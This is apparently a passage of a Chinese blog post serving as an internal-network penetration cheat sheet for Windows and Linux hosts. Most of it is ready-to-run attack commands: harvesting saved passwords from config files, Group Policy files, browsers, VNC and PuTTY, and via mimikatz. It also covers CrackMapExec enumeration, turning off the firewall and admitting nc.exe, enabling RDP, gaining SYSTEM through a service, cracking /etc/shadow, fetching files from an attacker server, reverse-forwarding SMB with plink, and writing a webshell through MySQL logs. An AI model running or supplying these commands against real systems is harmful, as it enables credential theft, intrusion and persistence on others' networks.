copy C:\Windows\System32\winevt\Logs\security.evtx
copy C:\Windows\System32\winevt\Logs\application.evtx

2. 工具导出

.\psloglist -x system > system.log
..\psloglist -x security > security.log
..\psloglist -x application > application.log
  • 检查是否安装了XAMPP,Apache或PHP,以及是否有XAMPP,Apache或PHP的配置文件
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
  • 查看是否有Apache网络日志
dir /s acces.log error.log
  • 查看是否有其它有意思的文件,它们可能在用户目录中(桌面,文档等)
dir /s *pass* == *vnc* == *.config* 2>nul
  • 检查配置文件
cd /web、findstr /s /m "password" *.*
  • 检查其中是否有包含密码的文件
findstr /si password *.xml *.ini *.txt *.config 2>nul

如:pass.txt  user.txt 等
如:web.config ,conn.php web.xml等
  • 检查其中是否有包含密码的文件
findstr /si password *.xml *.ini *.txt *.config 2>nul

findstr /si password *.txt  # 查询含有PASSWORD关键字的所有txt
findstr /si password *.xml
findstr /si password *.ini

# 查找文件的位置
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
  • Windows 自动安装过程中的一些凭证(base64)存储位置
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

# Metasploit 如下模块也可以获取到
post/windows/gather/enum_unattend 

# 安装IIS 管理凭证的 web.config可能包含明文密码 文件常见路径
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

文件内容通常如下:













# 包含密码的 groups.xml 文件和其他一些可能存储凭证的文件
C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml
\\domain\SYSVOL\\Policies\????\MACHINE\Preferences\Groups\Groups.xml

Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml
  • PowerShell获取剪贴板信息

       PowerShell获取剪贴板信息脚本 下载地址

  • 内网渗透提权exp补丁对比工具

       内网渗透提权exp补丁对比工具 下载地址

  • 探测等级1
net group "Domain Admins" /domain
  • 探测等级2
for /f %i in (1.txt) do net user %i /domain >>user.txt
  • 获取本地共享信息
net view /a \%COMPUTERNAME%
  • 查看本机共享信息
net share
  • 利用wmic查找共享
wmic share get name,path,status
  • 查看连接驱动
net use
wmic logicaldisk  get  caption,description,providername
  • 使用accesschk查看权限配置较弱的服务,以及能否重新配置
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
  • 查看未引用的服务路径
wmic service get name.displayname,pathma,e,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
  • 本地端口开放与连接信息
netstat  -ano
  • 阿里云列出IIS的站点信息
%windir%\system32\inetsrv\AppCmd.exe list site
  • 保存系统上所有注册表信息
reg export HKLM hklm.reg
reg export HKCU hkcu.reg
reg export HKCU hkcr.reg
reg export HKCU hku.reg
reg export HKCU hkcc.reg
  • 查询本机所有的盘符
wmic logicaldisk get description,name,size,freespace /value
fsutil fsinfo drives
fsutil fsinfo volumeinfo C:|findstr "卷名"     查看卷名称,需要管理员权限
  • empire收集信息,管理员权限
usemodule powershell/situational_awareness/host/winenum
  • 查看杀毒软件
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
  • 查看当前机器的进程信息
tasklist /svc   # 显示当前机器所有的进程所对应的服务 [只限于当前用户有权限看到的进程]
tasklist /m     # 显示本地所有进程所调用的dll [同样只限于当前用户有权限看到的进程]
tasklist /v     # 寻找进程中有无域管启用的进程,或者杀软进程
taskkill /im iexplore.exe /f     # 用指定进程名的方式强行结束指定进程
  • 指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"
  • 指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
  • 查看,删除 指定文件
type c:\windows\temp\admin_pass.bak    # 查看某个文件内容
del d:\ad\*.* /a /s /q /f              # 强制删除指定路径下的所有文件
tree /F /A D:\ >> file_list.txt        # 导出指定路径下的文件目录结构
rd /q/s c:\windows\temp\test           # 删除文件夹
  • 历史凭证信息收集
引用自:https://github.com/klionsec/RedTeamer
批量抓取当前机器上的 "各类基础服务配置文件中保存的各种账号密码"
   比如,各种数据库连接配置文件,各类服务自身的配置文件(redis,http basic...)...
想办法 "控制目标 运维管理 / 技术人员 的单机,从这些机器上去搜集可能保存着各类敏感网络资产的账号密码表"
   比如, *.ls,*.doc,*.docx, *.txt....
抓取各类 "数据库客户端工具中保存各种数据库连接账号密码
   比如,Navicat,SSMS[MSSQL自带客户端管理工具,里面也可能保存的有密码(加密后的base64)]
抓取当前系统 "注册表中保存的各类账号密码hash" [ Windows ]
抓取当前系统所有 "本地用户的明文密码/hash" [ Windows & linux ]
抓取当前系统的所有 "用户token" [ Windows ]
抓取 "windows凭据管理器中保存的各类连接账号密码"
抓取 "MSTSC 客户端中保存的所有rdp连接账号密码"
抓取各类 "VNC客户端工具中保存的连接密码"
抓取 "GPP目录下保存的各类账号密码" [ 包括组策略目录中XML里保存的密码hash 和 NETLOGON目录下的某些脚本中保存的账号密码 ]
抓取各类 "SSH客户端工具中保存的各种linux系统连接账号密码", SecureCRT,Xshell,WinSCP,putty
抓取各类 "浏览器中保存的各种web登录密码和cookie信息",Chrome [360浏览器],Firefox,IE,QQ浏览器
抓取各类 "数据库表中保存的各类账号密码hash"
抓取各类 "FTP客户端工具中保存的各种ftp登录账号密码", filezila, xftp...
抓取各类 "邮件客户端工具中保存的各种邮箱账号密码", forxmail, thunderbird...
抓取各类 "SVN客户端工具中保存的所有连接账号密码及项目地址"
抓取各类 "VPN客户端工具中保存的各种链接账号密码"
  • 利用工具CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec

#CrackMapExec
列出共享
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares
列出会话
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions
列出磁盘信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks
列出登录的用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users
列出域用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users
根据唯一的RID列出所有的用户
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute
列出域组
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups
列出本地组
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups
列出域密码策略
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol
尝试空会话
cme smb 192.168.127.235 -u '' -p ''
列出指定域信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET
列出ntds.dit的历史信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history
爬行C盘目录信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$
  • Lazagne

      LaZagne一个收集密码工具-LaZagne,每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码,这个工具是用来获取存储在本地计算机上的密码,诸如浏览器密码等等

      https://github.com/AlessandroZ/LaZagne

  • psloggedon

      查看本地登陆的用户和通过本地计算机或远程计算机登陆过的用户。如果指定的是用户名而不是计算机名,程序会搜索网上邻居中的计算机。原理是通过检查注册表HKEY_USERS的key值来查询谁登陆过。某些功能需要管理权限

PS:日志是本地机器的管理员日志,可以用脚本或者内置应用wevtutil导出来看,工具:psloggedon.exe,netview.exe,PVEFindADUser.exe,powersploit的PowerView脚本,Empire的user_hunter模块

      https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon

  • psexec

      psexec针对远程建立连接的认证方式有两种,一种先建立ipc连接,然后直接用psexec \10.10.10.10 cmd命令开启一个半交互式的cmdshell,另一种是在psexec的参数中指定账号密码。

      https://github.com/poweradminllc/PAExec

psexec \\10.10.10.10 c:\file.bat
  • 利用powershell收集域信息
Set-ExecutionPolicy RemoteSigned #开启RemoteSigned权限

Import-Module .\PowerView.ps1
  • 读取浏览器里存储的密码的工具【WebBrowserPassView

         支持IE4.0~11.0,火狐全版本、Chrome、Safari和Opera浏览器里的密码

         WebBrowserPassView 下载地址

  • 浏览器 firefox
%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\logins.json
%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\key3.db
%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\place.sqlite
  • 浏览器 chrome
// chrome记住密码保存的数据库位置
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
  • Mail PassView【邮件客户端读取密码 mailpv】

       Mail PassView 下载地址

该工具支持全版本的windows操作系统,支持如下客户端:
Outlook Express
Microsoft Outlook 2000 (POP3 和 SMTP 账户)
Microsoft Outlook 2002/2003/2007/2010/2013 (POP3, IMAP, HTTP 和 SMTP 账户)
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x
Mozilla Thunderbird
Group Mail Free
Yahoo! Mail
Hotmail/MSN mail
Gmail
  • 3389远程桌面登陆密码工具【rdpv】

       rdpv 下载地址

       读取保存在.rdp文件中的远程桌面密码

  • MessenPASS【读取一些社交软件客户端里存储的密码】

       mspass 下载地址

读取一些社交软件客户端里存储的密码。目前支持的客户端有:
MSN Messenger
Windows Messenger (仅支持dows XP)
Windows Live Messenger (仅支持ndows XP/Vista/7)
Yahoo Messenger (Versions 5.x and 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger
Trillian
Trillian Astra
Miranda
GAIM/Pidgin
MySpace IM
PaltalkScene
Digsby
  • 读取密码mimikatz
dpapi::cred/in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\92FB159ED290FC523E845094404697A
  • ie代理获取
reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v ProxyServer
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"

通过PCA文件查看执行如下语句

reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v AutoConfigURL
  • 查找本地的Credentials
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
  • 第三方软件

McAfee

   McAfee 的加密凭证存储在 sitelist.xml 文件中

%AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml

VNC

   UltraVNC

[ultravnc]
passwd=5FAEBBD0EF0A2413

RealVNC

   RealVNC 的密码可以直接在注册表进行查询

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Putty

reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
  • PowerSploit 相关的模块

PowerSploit 也可以用于发现存储的凭证,以下模块支持检查各种文件和注册表中的加密凭证和 plain-text

Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon

 

 

 

0x10 获取本地开放的端口与连接信息

  • 查看本地的计划任务
at或schtask
  • 查看计划任务信息(如果资源无法加载问题,是由于当前活动页码所致,将页码修改未437即可:chcp 437)
schtasks /query /fo  LIST /v
  • 查看计划任务和自定义实现
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

PS:(无法加载列资源,将编码设为chcp 437)
  • 查看主机开机时间
net statistics workstation
  • 查看计划任务信息
schtasks /query /fo LIST /v
  • 查看启动项
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
  • AlwaysInstallElevated是否启用
reg query HKCU\Software\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • 查看tcp/udp网络连接状态信息
netstat -ano         # 查看本机所有的tcp,udp端口连接及其对应的pid
netstat -anob        # 查看本机所有的tcp,udp端口连接,pid及其对应的发起程序
netstat -ano | findstr "ESTABLISHED"      # 查看当前正处于连接状态的端口及ip
netstat -ano | findstr "LISTENING"        # 查看当前正处于监听状态的端口及ip
netstat -ano | findstr "TIME_WAIT"        # 查看当前正处于等待状态的端口及ip
  • 基于icmp,探测主机
for /L %I in (0,1,254) DO @ping -w 1 -n 1 192.168.7.%I | findstr "TTL=" >> pinglive.txt

PS:常用的工具[最多10秒一个c段]:nbtscan[基于smb和netbios的内网主机发现方式]、Ladon、自开发工具
socks代理扫描:Goby

  • 查询进程
tasklist /wmic process list brief
  • 查询本机服务
wmic service list brief

 

 

0x11 防护墙配置

  • 检查防火墙
netsh firewall show state    # 查看防火墙状态
netsh firewall show config   # 查看防火墙配置
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
  • 关闭防火墙
Windows Server 2003系统及以前版本
netsh firewall set opmode disable

Windows server 2003之后系统版本
netsh advfirewall set allprofiles state off
  • 查询防火墙配置
netsh firewall show config
  • 修改防火墙配置
Windows Server 2003系统及之前版本,允许指定程序全部链接
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable

Windows server 2003 之后系统版本
允许指定程序连入
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
允许指定程序连出
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"
允许 3389 端口放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
  • 自定义防火墙日志存储位置
netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
  • 开启远程桌面连接
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

 


0x12 查询远程连接服务

  • 查看远程连接端口

在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
  • Windows 7下获取System权限
sc create syscmd binPath= "cmd /K start" type= own type=interact // 创建任务
net start syscmd // 运行 syscmd 任务
sc delete syscmd // 删除 syscmd 任务

 

0x13 工作组信息收集

工作组采取的一般都是常规渗透方法,因为工作组一般都是个人和少数服务器。

扫描网段中的web服务,常用的有phpstudy,wampserver等,来寻找搭建的服务漏洞
扫描开放端口信息,以及对应的服务,判断是否存在漏洞。
扫描主机由于没有更新到最新版本导致的系统漏洞,比如MS17-010,补丁号为KB4013389
hash抓取,hash注入,hash碰撞,口令爆破,IPC登陆,WMI,未授权访问,文件共享系统。
ARP嗅探/欺骗攻击(Cain和Ettercap)
DNS劫持,会话劫持。
社会工程学
...

 

0x14 其它

  • 查看当前机器的环境变量配置,看有没有我们可以直接利用到的语言环境
set 
  • 查看当前机器的NT内核版本,不弹窗
ver
  • 查看当前机器的NT内核版本,弹窗,在非图形界面不执行这个命令
winver 
  • 列出当前机器上的所有盘符
fsutil fsinfo drives 
  • 查看当前机器开启的共享
net share        
  • 查看当前机器安装的驱动列表
driverquery    
  • 设置共享
net share public_dir="c:\public" /grant:Everyone,Full   
  • 找当前用户可读写目录,可能会很多
dir /a-r-d /s /b   

 

 

                                                                                           分割线


0x15 域凭据收集

        【内网渗透】凭据收集总结


                                                                                           分割线


Linux 信息收集

0x01 版本信息

  • 所有版本
uname -a 

hostname
  • 内核版本信息
uname -r

uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

PS:知道版本号后,用kali 搜索相关的漏洞
命令:
    searchsploit -w ubuntu 16.04 4.4.x
  • 系统主机名字
uname -n
  • Linux内核架构
uname -m
  • 查看内核信息
cat /proc/version
  • 查看cpu信息
cat /proc/cpuinfo
  • 发布信息
cat /etc/*-release | cat /etc/issue
  • 主机名
hostname
  • 文件系统
df -a
  • 内核日志
dmesg / /var/log/dmesg

 

0x02 用户和组

  • 当前用户
whoami
  • 当前用户信息
id
  • 当前组
groups
  • 显示目前登录系统的用户信息
who
  • 查找SUID 文件
find / -perm -u=s 2>/dev/null
  • 查找执行哪些 sudo 命令无需密码
sudo -l

PS:sudo 执行的文件,提权辅助:https://gtfobins.github.io/

  • 当前用户可用的所有命令
compgen -c
  • 查看系统所有用户
cat /etc/passwd
  • 查看系统都有组
cat /etc/group
  • 查看所有用户hash(需root)
cat /etc/shadow
  • freebsd系统中也有类似sudo的机制,称作doas
cat /etc/doas.conf
  • 查询用户基本信息
finger
  • 当前登录的用户 w #目前登录的用户
users | who -a | /var/log/utmp
  • 登录过的用户
last | /var/log/wtmp
  • 显示系统中所有用户最近一次登录信息
lastlog | /var/log/lastlog
  • 登录成功日志
cat /var/log/secure
  • 登录失败日志
/var/log/faillog
  • 特权用户查看
grep :0 /etc/passwd
  • 查看passwd最后修改时间
ls -l /etc/passwd
  • 查看是否存在空口令用户
awk -F: 'length($2)==0 {print $1}' /etc/shadow
  • 查看远程登录的用户
awk '/\$1|\$6/{print $1}' /etc/shadow
  • 查看具有sudo权限的用户
cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)" 
  • 可以使用sudo提升到root的用户(root)
cat /etc/sudoers
  • 列出目前用户可执行与无法执行的指令
sudo -l
  • 查看邮件
ls -alh /var/mail/

 

0x03 环境信息

  • 系统环境信息
env 
  • 系统环境变量信息
set
  • 环境变量的路径信息
echo $PATH
  • 打印历史命令
history / ~/.bash_history
  • 显示当前路径
pwd
  • 显示默认系统遍历
cat /etc/profile
  • 显示可用shell
cat /etc/shells

 

0x04 进程信息

  • 显示进程信息
ps aux

ps -ef
  • 系统资源使用情况(总览系统全面信息命令,Ctrl + C 退出界
top -c

top
  • 查看进程关联文件
lsof -c $PID
  • 完整命令行信息
/proc/$PID/cmdline
  • 进程的命令名
/proc/$PID/comm
  • 进程当前工作目录的符号链接
/proc/$PID/cwd
  • 运行程序的符号链接
/proc/$PID/exe
  • 进程的环境变量
/proc/$PID/environ
  • 进程打开文件的情况
/proc/$PID/fd

 

0x05 服务信息

  • 由inetd管理的服务列表
cat /etc/inetd.conf
  • 由xinetd管理的服务列表
cat /etc/xinetd.conf
  • nfs服务器的配置
cat /etc/exports
  • 邮件信息
/var/log/mailog
  • ssh配置
sshd_config

 

 

0x06 计划任务

  • 显示指定用户的计划任务
crontab -l -u %user%
/var/spool/cron/*
/var/spool/anacron/*
/etc/crontab
/etc/anacrontab
/etc/cron.*
/etc/anacrontab
  • 开机启动项
/etc/rc.d/init.d/

ls /etc/rc.d/init.d/
  • 查看开机启动服务命令
chkconfig
  • 查看 rc 启动文件
cat /etc/rc.local           
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

 

0x07 网络、路由和通信

  • 列出网卡接口信息
ip addr show | /sbin/ifconfig -a
  • 列出网络接口信息
 cat /etc/network/interfaces
  • 查看系统arp表
arp -a
  • 路由信息
route / ip ro show
  • 查看dns信息
cat /etc/resolv.conf
  • 本地端口开放信息
netstat -an
  • 列出iptables 配置规则
iptables -L
  • 端口服务映射
cat /etc/services
  • 主机名
hostname
  • PID #查看进程端口情况
netstat -anltp | grep
  • 显示和操作IP路由表
route
  • 显示核心路由表
ip route
  • 显示邻居表
ip neigh  
  • 查看DNS
cat /etc/resolv.conf

 

0x08 已安装的程序

rpm -qa --last #Redhat
yum list | grep installed #CentOS
ls -l /etc/yum.repos.d/

ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

dpkg -l #Debian
cat /etc/apt/sources.list #Debian APT
pkg_info #xBSD
pkginfo #Solaris
pacman -Q #Arch Linux

 

0x09 文件

  • 最近5天的文件
find / -ctime +1 -ctime -5

 

0x10 公私钥信息

~/.ssh
/etc/ssh

 

0x11 日志

/var/log/boot.log
/var/log/cron
/var/log/faillog
/var/log/lastlog
/var/log/messages
/var/log/secure
/var/log/syslog
/var/log/wtmp
/var/run/utmp

 

0x12 常见配置文件

  • Linux 常见配置文件
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
  • 数据库配置文件、历史记录等
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
  • 下载shadow 爆破密码
mkdir /root/.john
cd /root/.john
unshadow passwd.txt shadow.txt > hash.txt

 

PS:

  • 在提权过程中,你需要将文件放到你的目标上

Powershell Cmdlet(Powershell 3.0及更高版本):
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell One-Liner:
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename","C:\Windows\Temp\filename")

  • 开放SMB 端口转发

plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS

  • 慢日志写SHell

set global general_log='on' 
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select ""

 

参考链接:

                    https://mp.weixin.qq.com/s/0-UpfCvUVzXZkTAEHHrdhQ

                    https://github.com/ZTHacker/Penetration_orders

                    https://mp.weixin.qq.com/s/LnjKK1YJ7BvMXPuFbeq37w

                    https://mp.weixin.qq.com/s/DNJPQdHzBSYx0s3YcPFOiQ

                    https://mp.weixin.qq.com/s/zQmd2QeiK4Ggkx6rLH724A

                    https://mp.weixin.qq.com/s/9ZwsdxGXscUv59oFpDhfIQ

                    https://mp.weixin.qq.com/s/7_XGgcUnGE8N73qP-tKjtg

                    https://mp.weixin.qq.com/s/I8sfpRvtQWP7GiqSILwcaw

                    https://mp.weixin.qq.com/s/pK4j81VuUh4WuOiJ26uJHQ

                    https://mp.weixin.qq.com/s/D6QLlN5ew8IbUp32TznUAQ

                    https://mp.weixin.qq.com/s/eX6RmlcinT8nKXkEgbdTlA

                    https://mp.weixin.qq.com/s/f0dyixyPpGujWuWWwbLDqQ

                    https://mp.weixin.qq.com/s/30xOtFsstX4wemiRKoMMwQ


虽然我们生活在阴沟里,但依然有人仰望星空!


 

你可能感兴趣的:(内网渗透篇,信息收集,信息收集)